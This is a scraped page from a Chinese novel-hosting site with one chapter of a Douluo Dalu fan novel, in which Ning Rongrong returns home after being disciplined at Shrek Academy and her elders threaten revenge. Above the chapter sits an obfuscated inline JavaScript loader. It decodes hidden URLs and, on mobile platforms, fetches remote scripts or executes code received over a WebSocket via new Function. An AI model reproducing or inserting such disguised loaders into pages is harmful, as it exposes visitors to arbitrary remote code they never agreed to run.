笔趣阁

字:
关灯 护眼
笔趣阁 > 斗罗大陆之我的武魂是空气 > 20.老者:我看谁敢打我孙子!
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

20.老者:我看谁敢打我孙子!

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
七宝琉璃宗。议事大殿。
  大殿北侧,坐北朝南的主位是一张酸枝木雕花大椅,椅背上镶嵌着一块极大的玉石。玉石呈碧绿色,散发着淡淡的温润气息,正是一块极品温玉。
  酸枝木雕花大椅上端坐一人,此人面如冠玉,鼻直口方,相貌儒雅温和,一身洁白的长袍纤尘不染。看上去大约四十多岁的样子,目光柔和,怎么看都像是一个普通人。一头柔顺的黑发披散在背后,一切看上去都是那么随意,没有任何做作。
  这时一个苍劲有力的声音在大厅内响起,声音仿佛是从四面八方而来,震的大厅簌簌作响。
  “风致,你就这么放心让荣荣一个人在外面么?难道那史莱克学院教的能比我们教的更好?不行,我要去把荣荣接回来。她在外面我可不放心。”
  随着声音的出现,一名须发皆白,但面庞却如同婴儿般细嫩的老者从后堂走了出来,大刺刺的在宗主宁风致旁的一张椅子上坐了下来。
  宁风致面露无奈之色,“剑叔,就冲您和龙叔,我也不能让这丫头留在宗内了。你们实在太宠爱她了,这丫头在家里已经没法管教。让她到外面受受教育或许会有些变化。”
  剑叔不满的道:“谁说我们娇惯荣荣了。你只看到了荣荣平时喜欢玩闹的一面,并没看到她乖巧的一面。你儿子不少,女儿却只有这么一个。你还真舍得。”
  宁风致断然道:“剑叔,这次不管怎么说,我都不会去找她,您和龙叔也都不能去。荣荣的安全您完全不需要担心。”
  剑叔怒气冲冲的哼了一声,“荣荣有事我就拿你是问。身上有点发紧了,我找老骨龙去活动活动筋骨。”
  “报~!”这时候外面传来了一个声音,随着声音的传递一个身着黑衣长相平平无奇的男子冲进了议事大殿内。
  “报!报告宗主,小姐回来了!”男子说道
  “什么?荣荣竟然回来了?以她的性子应该不会回来啊?他既然回来了,那一定是在外面受了什么苦!”剑叔气愤的说道,在七宝琉璃中,宁荣荣简直就是个小公主哪里受得了苦啊?
  “呜~呜~呜,爸爸!”一个齐耳短发的小女孩从外边冲进来边哭边喊道。
  看到女儿这惨样面宁风致原本以为是宁荣荣在外面受不了苦才回来的想法立马被斩断,这样子一看就是在外面被人欺负了。
  “说荣荣是不是有人欺负你了?告诉剑爷爷,剑爷爷帮你报仇!”没等宁风致开口剑叔便抢先一步说道。
  “呜呜!是史莱克学院的学员欺负我!”宁荣荣哭喊道,她这梨花带雨的样子配上本来就精致的小脸显得楚楚可怜,令人看了忍不住生出保护欲。
  “什么?这个弗兰德竟然这么大胆,我只是让他稍微教训你一下没想到他竟然敢这样做!”宁风致气愤的说道。
  “走!荣荣剑爷爷带你灭了那个史莱克学院去!”
  还没等剑叔有什么行动,宁荣荣便抢先一步说道:“见爷爷还是算了,稍微教训一下就好了。”
  宁荣荣觉得毕竟她在史莱克学院的短短几天体会到了一种另类的感觉,这让她有点舍不得小舞她们。再说本来就是因为她的刁蛮无理叶天才出手教训她的,而她之所以会跑来七宝琉璃宗,只不过是因为一时气愤需要冷静冷静,再加上自己都这样了,没有什么脸面面对其他人。
  至于叫剑叔去教训叶天他们也只是宁荣荣的一时气话而已。
  “即使他们也没有对我太过怎么样?只是因为我的刁蛮无理其中一个学员看不下去才出手教训我的。”说到后面宁荣荣的语气越来越弱。
  果然!如果不是这位大小姐挑事在先谁会冒着被七宝琉璃宗追杀的风险去打她呢?
  宁风致和剑叔想到。不过这只是对自己人的想法,对于外人还是稍加惩戒一番更好。
  “好了荣荣,既然他们欺负了你就应该受点教训,不然就显得我们七宝琉璃宗没有什么威信一样!”说着剑斗罗就要出去。
  知道剑斗罗已经下定了决心,可毕竟是未来要在一起生活的朋友宁龙润还是尽力的劝道:“算了,剑爷爷,也许他们说的对在外面我不应该刁蛮任性的。”
  “哼!不用劝了,荣荣剑爷爷答应你,不会把他们打的太惨的。”
  剑斗罗刚说完一个充满了压迫感的声音响起(哇,声音都能让人产生压迫感,不愧是封号斗罗!)
  “听说,有人要教训我的孙子?”只见突然出现了一名老人,他看上去六十多岁的样子,身材瘦长,但精神矍铄,衣服干净整洁,头发也梳理的一丝不苟,全身气息无一外泄就像一个普通人一样。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师